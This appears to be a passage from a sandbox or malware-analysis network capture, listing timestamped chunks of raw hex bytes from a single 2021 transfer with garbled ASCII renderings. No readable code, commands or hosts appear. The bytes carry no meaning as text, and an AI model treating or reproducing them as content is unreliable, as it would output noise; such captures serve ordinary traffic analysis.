                                                                                                  2021-11-24 13:17:21 UTC609INData Raw: b7 d1 dc 0e 05 23 5b ce 1e 81 d9 f1 bd da dc b2 86 2b bc 5b ac b5 2a 68 b0 b8 3a ec 21 e7 d3 42 12 59 d5 0a 4b 27 c5 d5 f4 6b 2a 97 80 3a da a1 51 85 da fb 82 f2 b4 a0 44 3d f0 62 89 57 81 c0 73 8e 99 20 63 f5 69 e6 62 14 64 e5 86 40 53 67 36 ae eb b3 44 86 2b 11 a3 83 a6 30 15 a3 83 76 bd 2a 17 f3 f0 f3 81 80 1a 76 d1 d5 a1 f6 fa fb e2 1a c1 ae 92 1d 80 63 e7 9d 44 93 f8 f5 0d f6 53 dd c2 17 fd 0a 47 80 9e 27 e0 61 45 43 c8 61 6d 28 a8 b4 47 ec db 58 fb fb f2 b0 4b a2 2d ea 3b 5a 5d 2a 6d 3d 08 06 98 8a 8c af fd bb f3 ac a3 1d 38 b2 7a c8 17 89 70 e1 70 55 e3 36 51 e4 cb fc 0f e3 13 34 4e f1 83 bc 5c 03 ae b7 c9 c1 f2 32 eb 6b 28 4c c3 dd d3 b8 ae 43 ed ee 2e c5 d3 06 e9 c0 c7 88 2f a4 e2 e4 a6 98 cd ad ab fb 3d c3 e6 54 2e 44 32 8d af 19 2a e4 49 c7 70
                                                                                                  Data Ascii: #[+[*h:!BYK'k*:QD=bWs cibd@Sg6D+0v*vcDSG'aECam(GXK-;Z]*m=8zppU6Q4N\2k(LC./=T.D2*Ip
                                                                                                  2021-11-24 13:17:21 UTC611INData Raw: ec 9d 68 eb c2 62 96 c3 79 67 81 41 d4 55 26 5f 09 55 d4 7f f9 98 69 d6 df 44 4d 0c d2 08 3b 02 08 e3 3b 67 5c 74 1f 6d 66 bb 53 65 b7 70 61 3c 63 b9 65 4e e6 55 47 f0 95 95 a4 e5 16 49 8d 56 ab 4f ed 7a c7 91 47 f8 b4 6a 33 e4 45 60 a5 1f 8c ac fd fc 65 e2 bc 5f 9b 10 a8 32 51 55 18 b9 7c 7c 3a aa 30 4f 73 e5 0a e3 65 f2 84 6b a7 e6 a2 6b e2 a3 45 70 48 5d a9 b6 1b fd 0a 2e 30 f8 42 1d 5b c9 c6 68 6d 97 ac a0 05 00 e1 38 3a fc d1 2c 73 e5 ed 83 b1 42 db fd 78 fb 2c 3f f3 e6 06 4c b3 b6 b9 91 88 83 c7 7e 2b b4 50 e8 20 c5 0c b1 70 9d e4 36 25 f2 79 23 c3 a3 12 5b 48 5a ee a3 c2 f8 33 08 79 5c 50 79 5f b6 5e f2 20 4e a3 70 b3 dd 77 14 f0 b0 31 08 6c bf 57 26 d8 d5 5f 79 29 3b 6d 4b 42 5e f7 6d 9a c6 7a 43 1f 3c 42 b1 ab ff dd 40 ca a0 68 10 83 4a 84 28 6f
                                                                                                  Data Ascii: hbygAU&_UiDM;;g\tmfSepa<ceNUGIVOzGj3E`e_2QU||:0OsekkEpH].0B[hm8:,sBx,?L~+P p6%y#[HZ3y\Py_^ Npw1lW&_y);mKB^mzC<B@hJ(o
                                                                                                  2021-11-24 13:17:21 UTC612INData Raw: b5 26 dd 75 90 fe 0a a5 86 88 a6 4e a7 8d 7a 3c df a6 20 8e b4 08 af 95 54 f7 ff 00 c2 af 8a 12 56 3f 6d 8c db 52 e6 f6 c9 bc b5 8e 6f e2 9c 46 30 af af 8b d2 b8 20 f6 3c 62 a0 d9 91 6f 7d bd 3a 46 be 44 48 b5 03 24 09 be db 7f 97 20 2c 01 53 28 c2 da ae 79 dd 0d 8d 18 c2 69 91 3a 36 ca fb 7c 61 f1 25 50 5a 9a 88 0c 25 69 28 58 ee a4 7f 85 07 a3 54 e3 fb f2 c0 c8 1f a0 e9 04 a2 a5 ec 1f 95 d0 59 fb 85 5a e5 d9 24 35 c1 b9 7c 55 eb 8e 21 1f 52 49 bf dc ee be 93 9e df 44 d7 ee c8 27 e6 65 3c c5 ca a2 64 4a d2 53 44 c5 70 45 0b e4 32 2e 23 d6 96 4e 4d 20 0c c9 0b d0 c0 c4 26 91 8c 11 bc 28 18 6c 4c ff 5b 23 53 f8 69 9b c7 0b fb b6 89 c8 7b 7b 8c 7d 93 9a 34 9e dd 3a 70 de a7 f0 01 ed 5a df d3 ab 35 e3 41 de 60 48 9d b6 91 d9 2f 2a e8 d2 f3 fb a5 6c 48 8a b7
                                                                                                  Data Ascii: &uNz< TV?mRoF0 <bo}:FDH$ ,S(yi:6|a%PZ%i(XTYZ$5|U!RID'e<dJSDpE2.#NM &(lL[#Si{{}4:pZ5A`H/*lH
                                                                                                  2021-11-24 13:17:21 UTC613INData Raw: 98 26 43 58 2b 40 aa 62 89 55 ed a7 ff 8e f4 ab 48 e7 b6 7f d5 57 6e 98 5d a2 dd 62 a4 0b 31 4b cb 31 e2 f6 4a 60 4a d3 48 5e 2d e0 67 4a 9f c7 8f 24 b1 98 d0 be 41 d0 58 49 f1 bc f1 55 f1 85 66 3b d7 95 ec 8b 97 66 b1 33 10 45 1b 37 bf e2 93 6c 0e 99 c4 a4 da 01 8a 9c bc 0e a0 39 f0 72 3e e6 2f 1d e7 48 a4 ea f8 35 85 6a 0b 9a b3 46 5b ec d3 20 76 84 d3 e8 2c fa 96 1f 55 4b e1 74 a8 06 02 e4 67 ba 83 13 36 02 4f 57 21 0f a9 d7 c0 5e a7 02 f8 33 60 43 0a 86 0c 22 08 a7 c3 27 62 f1 ec 8f d8 78 fe 1f 95 5e de d7 76 fa cd e2 89 80 b4 06 fe 83 44 98 15 73 e0 4d 00 0e ea d9 84 c1 5e f2 08 e1 a7 cd d4 16 4b 48 b9 96 2e c3 28 35 7b a4 8c fc 03 fe 3e a2 6d 9b 55 52 bd b8 ac f3 63 5a 99 33 8e 8c fa 56 07 7e b0 65 50 85 fe 13 2d e3 e3 86 64 b6 a4 7a fd 90 36 d4 ce
                                                                                                  Data Ascii: &CX+@bUHWn]b1K1J`JH^-gJ$AXIUf;f3E7l9r>/H5jF[ v,UKtg6OW!^3`C"'bx^vDsM^KH.(5{>mURcZ3V~eP-dz6
                                                                                                  2021-11-24 13:17:21 UTC614INData Raw: 65 eb 7b 47 64 f6 31 09 fb 53 46 08 49 b4 2d fb 67 8f 30 2a cf 09 dd 7c 31 39 93 85 7d ca e8 c0 73 90 fd 3c d8 7a 05 c0 83 05 5b bb e2 56 73 3d af b7 17 07 7c 77 b3 e1 54 8c 14 97 4c f7 86 a0 02 e4 cc 23 b9 b3 58 38 2f b3 28 5a 62 d0 51 ad 1a 48 04 ff 15 f9 d4 58 2b 09 9e 34 ce a5 f7 8e ad 8b 09 36 53 6c 53 e2 e5 65 eb 14 cf ea bf 9b fb 8e e7 bc dd a4 2a 24 11 b8 43 56 97 c8 1a 3a e8 82 85 c4 a2 f5 ca f8 df 02 9a 6a b6 b4 0d be a0 20 ee 5f 2f b9 32 e5 f8 13 ff 88 d6 19 e1 7a 5e 76 5c 84 90 9a e2 13 b8 e0 6d f5 15 40 c0 d0 03 b6 40 46 56 2f f5 4c 79 f4 34 08 3c d1 a7 f1 7e 39 73 22 fc de d7 86 15 ff 41 05 ae 3a 8d 2c c0 6f 50 29 8b 7f 20 18 50 d5 f9 09 51 4a b5 a9 f5 c8 e9 9f 8a 27 4e 78 6f 1d 03 83 6a 06 82 f6 ac 8f 6b a5 67 72 4a e7 bc 6e e7 66 36 ed 7a
                                                                                                  Data Ascii: e{Gd1SFI-g0*|19}s<z[Vs=|wTL#X8/(ZbQHX+46SlSe*$CV:j _/2z^v\m@@FV/Ly4<~9s"A:,oP) PQJ'NxojkgrJnf6z
                                                                                                  2021-11-24 13:17:21 UTC616INData Raw: b0 61 b3 ba 55 4b d4 70 3e 55 46 13 c6 46 6a 20 b0 e0 00 3c 9a db c0 7f 8d 4a 74 06 a1 fe 26 ea 7f 6f 74 41 44 92 e9 54 76 03 ab 2e 8f fb 55 f0 00 c2 d5 26 f4 12 66 b8 dc 2e 96 9f ee 73 cc 2c 1a d3 c9 a5 f5 78 2a 35 5c ac 98 e4 fe 02 9d 4d fb c8 02 01 24 08 78 d0 15 8c 41 51 e5 7c ed 97 8d b3 5a f5 49 af 12 69 a8 89 f8 18 01 c1 7e f6 ce ec 9a aa 45 df 82 8d 0b a4 aa e2 4a 0c aa 78 fb 6d a5 91 78 80 e2 af fd e0 37 e3 31 20 bd e2 82 df 84 fa e7 42 c8 55 61 5f 88 ef ae f8 8c 7f 7e 17 fe 08 f7 21 c9 d6 c0 0e 2b 69 15 f5 23 c8 f7 52 b1 2d 2e 32 f4 9a bf 31 ac 5b 25 a4 e7 b2 80 df 7a f7 55 b2 22 80 e9 c8 49 8c 5b 17 5d 5d 2c 36 59 58 2e ff 97 d3 08 9c 22 97 24 3d d6 d4 73 ea 3e 9a 02 97 b3 a0 7c c0 bf 56 c6 d7 fe 4b ae 81 80 2d a1 6f 0e 81 fc d2 2e 60 a5 f7 7e
                                                                                                  Data Ascii: aUKp>UFFj <Jt&otADTv.U&f.s,x*5\M$xAQ|ZIi~EJxmx71 BUa_~!+i#R-.21[%zU"I[]],6YX."$=s>|VK-o.`~
                                                                                                  2021-11-24 13:17:21 UTC617INData Raw: e4 7c 52 9c 00 23 8e ca d9 de b4 ac d2 9c 41 88 bb e6 55 d2 ed 4a e4 7c dd 33 21 34 ab 1f 5e 8b 80 bc b6 c3 f1 07 9e 5f 87 5c 3f a2 19 d0 3f 0b 28 ed eb 5e 49 28 a1 be 5d 8e 97 c1 6e 85 05 bb 59 da a1 38 c1 be 47 0c 2a 73 4f 22 38 7e 5c 69 33 ba 7a 7c 33 a9 e9 f1 d6 63 33 7e 2b 5e a5 53 8e b2 8e 9a cb 78 c9 00 c1 2a d0 b2 e6 3a 2c 44 65 e3 33 bd 7b 1c 6f d9 e6 87 6d d3 e8 31 e7 24 1a 13 e6 1c c5 af 47 23 57 e6 f9 60 0c 8c 32 ad f9 8f 3e 36 c3 ca c5 ab 6e 06 12 e2 8e 8b 4c 68 99 9f da d6 f2 e4 6a c0 5e 3a eb 6a 2a a7 37 7f 46 56 fa 9f 62 ea 7a ad b8 c9 14 c3 bd 17 24 63 4f 10 37 40 31 25 6b 12 ce 07 ef 1b 8f 1b f4 86 0f d5 37 34 81 11 e7 ab 10 bf eb 39 5d 07 4c 0c 8f 8b 23 4e 0f 69 e2 f7 6d 24 80 77 8e 78 12 55 76 4a c9 3e 3e da 07 fc 18 bb d3 a4 e6 ba d5
                                                                                                  Data Ascii: |R#AUJ|3!4^_\??(^I(]nY8G*sO"8~\i3z|3c3~+^Sx*:,De3{om1$G#W`2>6nLhj^:j*7FVbz$cO7@1%k749]L#Nim$wxUvJ>>
                                                                                                  2021-11-24 13:17:21 UTC618INData Raw: 12 39 2c 91 5c c3 77 dc 5f 45 4d e1 7a 07 5b cf c6 0f 09 f6 b9 ea c1 72 72 c4 c3 03 a9 d1 55 e6 23 8e e4 3d 7e e6 e4 00 68 2f 9b 45 00 85 09 4c 9c 87 36 6a ae 4c 91 63 88 2c 3a 00 01 82 e7 ca 06 2d 4c 62 c3 0d 4c e8 70 2d 3b a3 0d 3b 6e eb c3 a0 1d 90 6f f9 9e c7 1c 2d 7a 03 9f bc 76 4f 0e 1d 4a d0 b1 50 2e ff a1 59 22 de b8 a6 02 73 c4 76 34 12 c3 bc c5 33 bd 80 ee 29 f9 de ca 92 e0 f9 d0 d3 fc 52 74 46 53 cd 58 bc 7d 15 b4 af 9f ad 48 8d 92 68 1a 05 b8 75 c0 2e de 79 04 36 e1 8e 63 48 82 bb 63 1b 84 25 21 66 c4 dc 03 40 9f 44 b8 bb b1 97 bb b7 6f 8c c2 4d a5 ee 49 8c dd ac 49 23 7b f7 96 bb 19 3a fb 12 cf ee cb 4d dc 5d 26 75 d4 36 7d 93 c8 9e a2 2f 2b 9a fe 39 f5 43 c9 f1 d7 b9 78 cf 45 3e a1 5f a6 9a 54 ad 8d 10 8c ef 1e 94 69 e1 14 85 fa 51 dd ba 4d
                                                                                                  Data Ascii: 9,\w_EMz[rrU#=~h/EL6jLc,:-LbLp-;;no-zvOJP.Y"sv43)RtFSX}Hhu.y6cHc%!f@DoMII#{:M]&u6}/+9CxE>_TiQM
                                                                                                  2021-11-24 13:17:21 UTC619INData Raw: 66 76 14 4d 8c ca cc b5 28 b1 de e4 ea 5d c6 ad f6 42 f2 61 45 75 af c6 1f 46 3c fd 3d d4 2b 4f f3 e5 e2 d9 64 3a 6b f6 7f 02 54 4c 34 d3 bd b8 79 01 cb 10 64 a5 af 02 28 17 ef c3 86 63 91 8f ed 65 0f 92 fa e3 08 87 0b 22 e6 09 93 1b 89 f9 07 6e f8 c1 ad 4a c0 f0 85 dd 11 84 d4 3e 88 c9 6f 29 39 87 82 b7 b6 a0 fd 98 e4 20 6c 84 5c 7b 5a 00 5d ce 06 f3 8d 25 85 27 6f 03 85 1a 1a 4c bf 69 2f ed 64 97 72 c7 59 b9 10 87 2b 09 37 67 2f bf 06 b2 62 64 9d 1e 58 60 36 31 6e b2 13 95 12 f1 4e f6 e0 7f cc 8e 3a 20 05 15 33 0f 36 ce 84 4a 5f 69 29 04 e9 10 ed 0f 85 7b 9a af 32 a4 03 55 b0 3f 28 71 4d 9c ca 76 c4 58 a0 73 f0 47 85 20 7f bd 4d 38 a9 1d 24 b8 22 92 0a 58 4a ab 7c 3e 55 23 8e b7 b4 aa d8 06 af 3f 27 36 c4 69 f6 43 55 df 7f 56 95 64 dc db 3e 29 eb 56 66
                                                                                                  Data Ascii: fvM(]BaEuF<=+Od:kTL4yd(ce"nJ>o)9 l\{Z]%'oLi/drY+7g/bdX`61nN: 36J_i){2U?(qMvXsG M8$"XJ|>U#?'6iCUVd>)Vf
                                                                                                  2021-11-24 13:17:21 UTC621INData Raw: d5 93 df cf 3f 87 fd aa 4f f4 20 dc 8c eb 6c 29 3f fc 6d b4 50 8c f9 2a ce 69 5a ef a2 69 8d 28 c9 93 52 ef 3e 90 57 26 dd 90 4f 34 2c ec ce 87 39 5e 0a ed 62 f7 1a 31 5d 8b f9 5f ec 98 ad e2 a6 b6 27 95 0a 01 f5 83 7a 24 ab 77 9a 39 92 fa 42 d6 98 55 2a f5 55 e5 a5 08 40 e1 c2 0c e5 be da 6b b9 2c f8 69 f9 83 83 a0 16 49 ec d9 16 9a c2 14 d0 cf 23 41 e8 60 9e dc 71 d5 c4 8e 58 56 96 bb 12 46 19 48 62 28 19 83 33 71 d7 1d 52 79 9c ba fd 8b 61 12 95 69 13 b3 9d 7e f8 4f 83 42 00 d4 73 5e 15 bf 62 36 16 42 3f 74 22 19 94 a3 76 8f 48 81 1f be 9b 09 0e 8f 4b b1 15 50 f3 4a 96 bf 84 46 70 89 1e c0 35 40 f2 08 e7 77 bb 81 e0 b9 99 34 e5 fe 60 c9 bb 1f 13 f6 c5 62 42 cc 8f 77 54 5b 30 c5 de ed 52 e0 31 33 54 94 ce 04 5f d0 ca eb 85 b4 89 f3 29 c1 a0 67 2a f4 70
                                                                                                  Data Ascii: ?O l)?mP*iZi(R>W&O4,9^b1]_'z$w9BU*U@k,iI#A`qXVFHb(3qRyai~OBs^b6B?t"vHKPJFp5@w4`bBwT[0R13T_)g*p
                                                                                                  2021-11-24 13:17:21 UTC622INData Raw: 73 49 81 0e 10 39 ba cd e6 a3 2e 58 33 0d 65 fb 62 54 43 81 b0 99 29 b6 9b b1 4b 7e 2c 31 3e bc 6f 29 b0 a2 b7 75 e6 3a ec 3a 2f 07 46 08 8b de 83 00 ac 8b 19 74 23 2b 0d b8 64 a6 c2 01 f9 07 f6 ad c5 29 0f 96 6d 69 3e 66 65 cf d5 23 9d 8a 12 f3 0d 25 19 91 14 92 e2 7c db dd 0b 07 dd 44 0c d7 fe 0c 69 7d 78 9c 18 5c 21 ee 53 8a 01 d0 76 18 e7 31 2b 96 8a 28 c4 8c 17 ac 05 e3 56 76 6e 58 63 1b d0 13 fc df ea ca af 21 4e c1 6d cb c7 5c 78 a1 00 50 b3 8d 21 2a 37 d7 5b d3 4e 9e 7e ab 85 cc 42 ae 57 44 27 d2 7f 8a 48 e0 93 85 cf 69 40 ba 19 55 e9 33 f4 15 37 1b aa f9 3d ed 92 de 4f 5e 87 63 93 1f bb 57 2b 6e bc db 26 38 d2 45 92 69 79 1d 18 09 6d 07 1a 4d 9c ea c1 f4 a5 f3 f0 ca 97 02 7a 98 e8 1c 65 5e ff 68 4d 7c 60 e1 95 cc ca ef 17 d6 6d cd 04 30 b3 9d e3
                                                                                                  Data Ascii: sI9.X3ebTC)K~,1>o)u::/Ft#+d)mi>fe#%|Di}x\!Sv1+(VvnXc!Nm\xP!*7[N~BWD'Hi@U37=O^cW+n&8EiymMze^hM|`m0
                                                                                                  2021-11-24 13:17:21 UTC623INData Raw: 55 c3 03 95 55 7e 94 4c 69 c7 c4 2e 19 d2 49 3b 63 9e bd ca 4a 01 16 13 75 4f e6 bf 98 e7 7f ce 01 46 ab fc b6 55 78 41 37 f4 a1 3a 43 26 0a 3e fd 6d ea 60 de ba 19 c3 b1 d7 c3 fd 3c a5 9e 2c 3b 8b c5 c1 a3 c8 f0 e5 2c a1 5e d7 06 d3 99 e7 c7 9f 23 20 ba fc ac 58 3b d6 c0 eb e5 65 fe 95 6b 4d fa c8 9b ce a6 6f 6e 97 97 db c8 25 7e e3 52 80 ac ab 80 37 43 b0 72 97 b8 1d 3f 29 06 b4 bd 73 21 1b 87 46 86 28 e6 31 ea 67 65 ab 82 10 9e b9 f8 8a b3 9e a3 6c 41 e1 4f ac f3 83 47 5c 2f 6f 2e 9e b4 cf 2f 97 0f 17 74 c7 23 b8 ca 33 fe ae a0 67 1c 1b 85 01 2b c4 43 13 24 21 91 99 8b 5a c4 d6 c5 b0 a6 64 9c 52 40 c6 a9 1f e2 fa 0f 75 f3 b3 a4 ff 61 80 ff ec d3 b5 e0 74 4e af de 10 d5 cb 4a c3 be e8 8c 02 43 df 6f 6f 22 43 56 3d f2 24 8a 3d 74 ba 2c f1 25 79 05 a2 a7
                                                                                                  Data Ascii: UU~Li.I;cJuOFUxA7:C&>m`<,;,^# X;ekMon%~R7Cr?)s!F(1gelAOG\/o./t#3g+C$!ZdR@uatNJCoo"CV=$=t,%y
                                                                                                  2021-11-24 13:17:21 UTC624INData Raw: 11 6c 8a 3d a5 84 0a bd 36 e1 fc da fb fc 80 ab 21 1f ab 09 cd 1b 88 85 30 b8 79 9d 3c 8e ac 51 b5 d8 3a 1a 1a 53 9a ef 99 ee b2 29 c9 e2 ee 64 47 0f 31 ba 65 50 bb 0e 63 23 7d ae b8 89 d4 c0 24 04 aa bb 73 b1 a3 95 37 68 c6 8e 89 2d 5b 0c 1c 2d 31 ed bd 4d 9e 11 c4 f4 93 22 93 d0 50 ea 79 3a 63 f3 5a 11 4a 69 6b 7d e9 35 be df fb 71 3b 0f 4f c9 ac 29 57 6d 27 52 e2 40 61 dc b3 2a a8 11 6c b1 40 47 1e fd cf 4e 3a 26 22 bf cd ae 22 31 56 0d df 4f 1b cb be f8 b6 e4 08 d2 4f fb 83 a8 97 0a 77 32 79 71 98 d9 63 e2 12 be d0 4c 82 66 7a 71 e1 ea b5 5a bd f8 f3 2a 48 a1 1d 70 45 ac 92 b4 70 7c d1 78 05 d9 3d 83 f5 d3 a6 04 47 d8 bb f6 08 ee 18 33 73 61 63 3f 45 ae d0 e9 34 5d 87 ab 49 41 40 33 7a 63 b2 b0 50 94 56 40 47 07 3c 47 61 ad 04 be e4 d7 ea 52 14 2a 8f
                                                                                                  Data Ascii: l=6!0y<Q:S)dG1ePc#}$s7h-[-1M"Py:cZJik}5q;O)Wm'R@a*l@GN:&""1VOOw2yqcLfzqZ*HpEp|x=G3sac?E4]IA@3zcPV@G<GaR*
                                                                                                  2021-11-24 13:17:21 UTC625INData Raw: 6e 96 d5 e8 73 a5 81 4e 02 a5 e4 90 61 8b e5 02 8d fd 70 f3 5d 2c a3 07 73 de a4 98 36 06 52 0f 14 10 33 9c 68 55 c3 72 c2 34 cd 18 c3 4a 74 1c 6f 5b 3c dc e0 31 ba 8f 1e a9 17 e2 90 59 16 1a c9 f1 9f f7 a5 2a 9c 13 6b 92 21 12 56 54 90 57 16 c0 34 7d d4 17 3c 27 a9 8a 11 94 b9 6e 4f 63 70 da d4 81 f0 4c ec b5 48 81 2d 8c 7f fe 1c a7 47 b3 29 e1 0b 82 ee 33 cb 67 de 34 21 7f 92 16 2d eb a9 cd 60 20 61 ef cb fe 9c a2 70 88 a4 52 6b bf 60 3b d4 34 c9 d7 fd 2d 7c 86 35 4c b8 76 53 95 86 41 6e ff e7 37 d4 af 6e 7c fc e6 10 33 af e1 f4 67 b9 e0 fc d3 80 22 98 f0 63 e1 b8 75 c6 2a c4 7f ea 80 62 65 7b 16 a0 db b7 95 c9 0c 79 fe 47 17 35 d4 33 f0 2f 84 85 94 14 6b 56 4e 60 df 4e e2 b2 0a a6 da 9e 39 6d 38 da 3c a0 a7 1f 4e 23 7c a5 51 f8 a4 0a 6d 50 d4 be fc fd
                                                                                                  Data Ascii: nsNap],s6R3hUr4Jto[<1Y*k!VTW4}<'nOcpLH-G)3g4!-` apRk`;4-|5LvSAn7n|3g"cu*be{yG53/kVN`N9m8<N#|QmP
                                                                                                  2021-11-24 13:17:21 UTC627INData Raw: df 63 36 e1 ab 74 f1 c7 66 7e 02 ce b1 77 8b 7e 31 96 0a 58 3d 5f f4 c1 77 e0 ed 5c ac ce 54 3c 9c 0d 2a 0e b1 1b 9a e5 b9 a6 35 52 3a c4 a0 ab 43 1a 0a 3b 91 5c 16 ae 6d c1 f8 9f 70 bb c5 93 ce d6 ad 6f c6 11 a5 74 a6 39 f1 d8 35 57 d8 6c 8f dc 92 07 89 3e 5e 1c 2b f5 a8 d8 6c 29 c3 4c e6 78 fa 94 32 4a 4e 53 6f a1 97 bf e0 5e 61 16 d6 ca 18 ed 2d 98 5d ac f8 30 e5 7f 7f 70 3b c9 00 bc 40 87 3c 52 ba 3a 98 85 cc c3 6c e5 5f 39 5b 0e d9 12 94 c8 37 49 10 ee 80 90 3e e7 36 13 70 66 4f 56 2e 3e fb 5a fe df c4 1e cd ac 69 86 79 61 0c d3 31 fb 68 01 12 0a 31 b5 68 ca 07 97 66 19 58 99 8a c8 45 8a 7a 53 ad 74 f9 06 c7 1f eb 1e d1 b0 f2 9a fb 16 d6 f0 be ae ee ee 7e e2 d9 35 1b e2 99 a8 aa bf 5f b8 9c 93 f2 f3 21 cc 03 7f 5f 16 0b c6 92 20 81 4f 46 ce d6 b4 0f
                                                                                                  Data Ascii: c6tf~w~1X=_w\T<*5R:C;\mpot95Wl>^+l)Lx2JNSo^a-]0p;@<R:l_9[7I>6pfOV.>Ziya1h1hfXEzSt~5_!_ OF
                                                                                                  2021-11-24 13:17:21 UTC628INData Raw: 07 9b 49 95 da 3f ed 2b 75 f1 65 61 3b 63 8a 4a c5 e6 13 57 b0 55 c0 53 8e 88 d4 ea 3a 89 4b d6 9d cb 7e e6 6e 16 ed c9 5f cd 57 2b b2 c5 a0 32 d8 68 55 62 b0 c8 fa e0 e2 43 57 44 67 26 23 8a bf e3 16 06 16 cd f4 11 0a 10 52 f8 8d 08 53 3a a8 b3 d5 4b 87 6b 45 b8 0c 6e a7 06 34 d5 21 63 1f 15 5c 9f 79 e4 40 e5 b6 e5 47 22 6d ae 5f 21 24 c3 dd 54 5a 0e 16 12 28 75 02 0a 05 64 6a 24 d7 32 b4 df 66 e0 46 7a 21 46 5d a6 e2 3c 30 fc 4b 5b 84 6c 1d 29 07 77 6c 96 56 72 c0 9f 81 dc 67 c6 38 29 db 9c 92 a7 7c ee f3 4c fb 18 3a 27 10 ca 64 ea 49 c7 b9 f3 be 50 fb 8a d9 53 a4 c3 23 5b 78 72 40 26 7b 9e af c5 64 fc 1c 5b 24 37 73 25 7c 7f 7e f2 74 0c af 29 3e 45 3e 36 e8 43 db d7 33 16 f9 34 65 5a a7 bd 0d 58 3a a2 28 e8 20 b2 fb a3 a6 d4 74 5e ec ac 90 c2 93 40 4f
                                                                                                  Data Ascii: I?+uea;cJWUS:K~n_W+2hUbCWDg&#RS:KkEn4!c\y@G"m_!$TZ(udj$2fFz!F]<0K[l)wlVrg8)|L:'dIPS#[xr@&{d[$7s%|~t)>E>6C34eZX:( t^@O
                                                                                                  2021-11-24 13:17:21 UTC629INData Raw: d2 c3 6a 4f b6 ec c9 89 e3 f5 44 cb 64 47 ed f3 d7 62 ce c8 e2 7f 67 48 f2 74 97 18 54 39 81 7b 70 ee f6 38 26 7a 57 eb e5 8e 6a c8 11 2b 44 a1 c9 f5 2f 95 a9 59 aa de b7 0a 87 fd 68 72 08 81 15 83 6d 16 1f a2 86 a9 44 51 55 8f 83 fa 7f 5f e0 16 a6 0c a1 9a 50 da 37 e3 dc 39 c5 fd e8 5b e8 e3 6a 09 3e c5 d7 c6 b2 c3 3e ed 75 78 1b 9f 72 06 2e eb 02 a3 b3 37 2d a8 ff db f6 01 82 78 5b 65 ba 42 02 b7 bb 43 45 f6 47 7f 32 32 e4 63 ff 79 fc 1e 50 d1 db c6 33 c2 11 8b 23 36 04 c0 ee 37 d4 da 76 d1 6b 9c 96 8a 1b aa 33 54 67 26 03 ab d8 c9 07 43 1c 96 4b cb 4a b8 4c c2 fd 85 c5 31 d6 ef 2b 3a ee 89 fc 74 2e d3 a1 f1 3c cc 6b 8c 9b 2a 13 a8 17 59 28 3a 25 f0 11 d0 14 3d 80 0d 90 ec 6e 81 bb 10 71 a4 e5 69 78 7e 66 37 b5 25 ca 92 ae 80 08 4c 72 83 09 f1 dc 22 c6
                                                                                                  Data Ascii: jODdGbgHtT9{p8&zWj+D/YhrmDQU_P79[j>>uxr.7-x[eBCEG22cyP3#67vk3Tg&CKJL1+:t.<k*Y(:%=nqix~f7%Lr"
                                                                                                  2021-11-24 13:17:21 UTC630INData Raw: 52 58 b6 8a db 7c 77 4d b0 0c eb 07 5f 45 a5 a6 74 34 22 7e 80 7e b5 62 7c 52 73 f1 22 c7 10 c4 ef f1 2a bb a9 bb ce 48 19 68 c6 4a d8 2b 7b 6b c9 0f 1a d0 38 b2 63 6c 59 d6 a4 90 e7 66 79 35 b6 24 64 a3 f5 24 4d 03 04 a8 68 83 e6 7c 65 ad c6 6b 7c 04 b1 58 1e 14 9e 04 61 ed c9 92 16 c2 aa 0e 94 ec 95 29 fb 44 2d e7 4a ee e2 e6 28 46 29 4b f0 87 4a 09 15 fe df ee c4 b4 e2 8f 44 d1 61 5c 24 82 be a5 b4 b9 2c 60 9f 97 ac 30 f8 74 e6 ff 86 b5 68 e3 f4 91 fc 5a 43 df 52 49 a9 11 c0 bc 97 e1 b4 ab 7d ad 8e a4 38 73 c1 77 1a 50 84 53 46 95 29 2f 4b ac 6d 72 3d 4e 3a f7 4c 5e d2 4c b3 1d 2d 24 9e b2 91 d4 be 92 1d dc ef 25 5d f6 4d c6 3e 13 9b 2c 75 9d 09 66 42 26 92 fa 4f 5b 72 86 96 5f bf d6 9c 0b 1b c6 a5 eb b1 5a 20 20 55 aa 84 a2 96 8c f5 05 90 c6 8c db e0
                                                                                                  Data Ascii: RX|wM_Et4"~~b|Rs"*HhJ+{k8clYfy5$d$Mh|ek|Xa)D-J(F)KJDa\$,`0thZCRI}8swPSF)/Kmr=N:L^L-$%]M>,ufB&O[r_Z U
                                                                                                  2021-11-24 13:17:21 UTC632INData Raw: ca e0 86 8e bd ad 5e 7a bc 14 b5 d5 58 05 23 54 3d b3 46 f2 de ba 2a c5 e2 ec d8 03 23 a2 6e 8f 4d cf 8b ad 64 31 62 d5 bc 82 ef 4c 4c bc 04 08 20 08 1d d2 83 1f 1e 4e 0a b7 d1 69 9d 44 b0 86 6b 3d 7e 71 11 43 e1 4c 61 5e a6 fc 56 d7 f2 5f d6 5e 95 1f f7 47 48 f5 70 be e5 07 bb 5b c8 9d 23 95 a3 0a bc 3b 3f 77 b8 c8 b2 68 b4 52 15 a2 e8 55 b2 ab 8c 9b 85 1a 3b 5a b7 60 4a 28 83 0e 4d c1 cd 18 00 a9 b2 3b b3 84 56 f8 13 08 a8 fa 1c 4f aa 96 58 6e e9 15 1a 8d fe 3b 08 8d 38 9c 69 bf 4d 31 58 36 be ae 04 f1 c9 8b 79 e6 9f 13 07 fb a1 0c 52 07 f9 ef 15 f9 cc 80 af d6 1a c1 5e 59 7a 93 fd 04 42 0f a7 06 13 5d 44 ba 53 3f 83 11 34 cd 29 20 9c 40 96 d5 ec ab 2a 20 d1 7f 6c 4f 6a 14 d5 58 a3 ce 78 a9 e2 e1 42 55 7f c9 bb f1 f6 00 91 5f 46 f6 2e f5 9f 33 b6 c0 3b
                                                                                                  Data Ascii: ^zX#T=F*#nMd1bLL NiDk=~qCLa^V_^GHp[#;?whRU;Z`J(M;VOXn;8iM1X6yR^YzB]DS?4) @* lOjXxBU_F.3;
